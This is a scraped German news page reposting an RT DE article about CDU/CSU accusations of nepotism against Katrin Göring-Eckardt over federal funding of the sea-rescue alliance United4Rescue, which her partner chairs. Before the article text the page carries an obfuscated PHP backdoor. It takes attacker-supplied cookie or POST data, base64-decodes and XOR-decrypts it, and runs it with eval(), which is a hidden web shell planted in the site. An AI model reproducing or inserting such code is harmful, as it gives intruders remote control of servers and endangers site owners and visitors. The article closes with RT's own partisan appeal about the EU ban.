$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> CDU wirft Göring-Eckardt „Vetternwirtschaft“ vor — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch CDU wirft Göring-Eckardt „Vetternwirtschaft“ vor — RT DE

CDU wirft Göring-Eckardt „Vetternwirtschaft“ vor — RT DE

0
CDU wirft Göring-Eckardt „Vetternwirtschaft“ vor — RT DE



Der Haushaltsausschuss des Bundestags entschied, ein Seenotrettungsbündnis mit zwei Millionen Euro jährlich zu fördern. Der Vorsitzende des Bündnisses ist Thies Gundlach, der Lebenspartner von Katrin Göring-Eckardt. Die CDU sieht einen „faden Beigeschmack“.

Hat sich die Bundestagsvizepräsidentin von den Grünen, Katrin Göring-Eckardt, der „Vetternwirtschaft“ schuldig gemacht? Diesen Vorwurf erhob die CDU/CSU im Hinblick auf die Förderung eines Seenotrettungsbündnisses.

Der Haushaltsausschuss des Bundestages hatte entschieden, das Seenotrettungsbündnis „United4Rescue“ mit zwei Millionen Euro jährlich bis zum Jahr 2026 zu fördern. Der Vorsitzende von „United4Rescue“ ist Thies Gundlach, der Lebenspartner von Göring-Eckardt.

Wolfgang Stefinger (CSU), Bundestagsabgeordneter und stellvertretendes Haushaltsausschuss-Mitglied, sagte gegenüber der Bild-Zeitung:

„Dass im Vorstand dieses Vereins der Lebensgefährte der grünen Bundestagsvizepräsidentin sitzt und dass der Verein großzügig durch das Grün-geführte Außenministerium gefördert wird, hat schon einen äußerst faden Beigeschmack.“

Carsten Körber von der CDU fügte gegenüber Bild hinzu:

„Dadurch bewegt sich das Engagement der Ampelkoalition deutlich in Richtung Vetternwirtschaft.“

Göring-Eckardt erklärte gegenüber der Zeitung, dass sie nicht direkt an dem Beschluss mitgewirkt habe. Sven-Christian Kindler, Haushaltspolitischer Sprecher der Grünen, teilte auf Anfrage der Bild mit:

„Ich hatte mit Frau Göring-Eckardt für den Beschluss des Haushaltsausschusses für die Förderung von United4Rescue keinen Kontakt.“

Die Grünen-Politikerin setzt sich seit Jahren für die Seenotrettung ein. Auf Twitter schrieb sie:

„Wir brauchen ein Europa der Menschlichkeit. Eine staatlich organisierte europäische Seenotrettung, mehr legale Wege nach Europa. Zivile Retter*innen dürfen nicht länger kriminalisiert werden.“

Mehr zum ThemaHabeck-Ministerium: Roter Teppich für BlackRock

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten. Anmerkung: Allerdings hat Österreich mit der Änderung des „Audiovisuellen Mediendienst-Gesetzes“ am 13. April diesbezüglich eine Änderung eingeführt, die möglicherweise auch Privatpersonen betrifft. Deswegen bitten wir Euch bis zur Klärung des Sachverhalts, in Österreich unsere Beiträge vorerst nicht in den Sozialen Medien zu teilen.





Source link